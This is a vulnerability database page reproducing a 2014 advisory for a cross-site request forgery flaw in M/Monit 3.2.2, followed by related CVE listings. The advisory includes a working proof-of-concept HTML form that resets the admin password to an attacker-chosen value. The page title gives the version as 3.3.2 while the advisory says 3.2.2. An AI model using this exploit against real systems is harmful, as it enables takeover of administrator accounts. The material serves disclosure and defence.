Lucene search
+L

M/Monit 3.3.2 - Cross-Site Request Forgery

🗓️ 20 Sep 2014 00:00:00Reported by Dolev FarhiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

M/Monit CSRF vulnerability allows attackers to reset any user password without knowing the current passwor

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
M/Monit 3.2.2 Cross Site Request Forgery Vulnerability
20 Sep 201400:00
zdt
cve
CVE
CVE-2014-6409
6 Oct 201423:00
cve
cve
CVE
CVE-2014-6607
6 Oct 201423:00
cve
cvelist
Cvelist
CVE-2014-6409
6 Oct 201423:00
cvelist
cvelist
Cvelist
CVE-2014-6607
6 Oct 201423:00
cvelist
euvd
EUVD
EUVD-2014-6289
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2014-6486
7 Oct 202500:30
euvd
nvd
NVD
CVE-2014-6409
6 Oct 201423:55
nvd
nvd
NVD
CVE-2014-6607
6 Oct 201423:55
nvd
packetstorm
Packet Storm
M/Monit 3.2.2 Cross Site Request Forgery
19 Sep 201400:00
packetstorm
Rows per page
Vulnerability title: M/Monit CSRF Author: Dolev Farhi Contact: dolevf at
openflare dot com @dolevff Application: M/Monit 3.2.2 Date: 13.9.2014
Relevant CVEs: N/A Vulnerable version: <= 3.2.2 Fixed version: N/A 1.
About the application ------------------------ Easy, proactive
monitoring of Unix systems, network and cloud services. Conduct
automatic maintenance and recovery and execute meaningful causal actions
in error situations M/Monit expand on Monit's capabilities and provides
monitoring and management of all your Monit enabled hosts via a modern,
clean and well designed user interface which also works on mobile
devices. 2. Vulnerabilities Descriptions: -----------------------------
It was found that M/Monit latest version is vulnerable to CSRF attacks.
it is possible to reset the password of any user account (admin/regular)
on the system without needing to know the current set password for the
attacked account. 3. Proof of concept exploit
---------------------------- <html> <! -- CSRF PoC for M/Monit --> <div
align="center"> <pre> <h2><b> 		 CSRF PoC for M/monit 			<b></h2> <body>
<form action="http://mmonit_server:8080/admin/users/update"
method="POST"> <input type="hidden" name="fullname"
value="Administrator" /> <input type="hidden" name="password"
value="Attacker_Passw0rd" /> <input type="hidden" name="email"
value="[email protected]" /> <input type="hidden" name="admin"
value="on" /> <input type="hidden" name="uname" value="admin" /> <input
type="submit" name="submit" value="Attack" /> 	</form> 	</body> </div>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Sep 2014 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.06647
35